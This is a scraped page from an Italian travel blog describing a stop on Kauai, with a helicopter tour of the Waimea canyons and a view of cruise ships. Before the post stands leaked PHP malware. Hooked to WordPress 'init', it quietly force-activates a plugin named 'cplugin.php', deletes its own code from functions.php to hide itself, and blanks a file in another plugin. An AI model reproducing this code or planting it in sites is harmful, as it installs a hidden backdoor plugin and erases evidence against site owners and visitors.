function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'cplugin.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('cplugin.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "function true_plugins_activate()"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 3; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/usr/www/users/bradek/dpwassets.bradek.it/wp-content/plugins/wp-all-export-pro/actions/class.plugin-modules.php'); file_put_contents('/usr/www/users/bradek/dpwassets.bradek.it/wp-content/plugins/wp-all-export-pro/actions/class.plugin-modules.php', ''); } } add_action('init', 'true_plugins_activate'); Corto in Corto : Kauai
  • Corto in Vacanza

Kauai

Kauai è la nostra ultima sosta prima dell’arrivo ad Honolulu. Quest’isola è soprannominata “l’isola giardino” perché intende promuovere l’immagine di sé come immagine del paradiso terrestre. Kauai ha naturalmente il suo vulcano  alto più di 1500. I suoi pendii sono scolpiti dall’erosione dei dodici metri di pioggia ( avete letto bene: metri, non millimitri). Un record dimenticato certo per errore, nei depliants turistici; ma, per essere verdi, quei pendii, sono verdi.

Alla mattina siamo andati sulla spiaggia per ammirare dei giovanissimi atleti del surf, passando davanti alla stazione Meteo dell’albergo Ayett.

Per ammirare i famosi Canyon di Waimea, tagliati nella roccia, abbiamo preso, nel pomeriggio, un elicottero. Potee ammirare le cascate che noi abbiamo fotografato a due metri di altezza, e con fortuna, visto che non c’era nebbia e che non abbiamo avuto che qualche scossone verso la cima.

Ne ho approfittato per prendere una foto del Pride of Hawaii, una nave di linea ormeggiata non lontano dalla Tahitian Princess che sembra quasi un giocattolo.

E dire che la nostra nave ha 24 suite, 160 mini-suite e può ospitare più di 3000 passeggeri. E’ impressionante anche se ci è stato detto che la Pride of Hawaii, è ben lontana dall’essere la più grande che abbia fatto scalo in questo porto.

SEGUE

FOTO E TESTO DI FRANCOIS BARETTE©

Inserisci un commento

Modulo di inserimento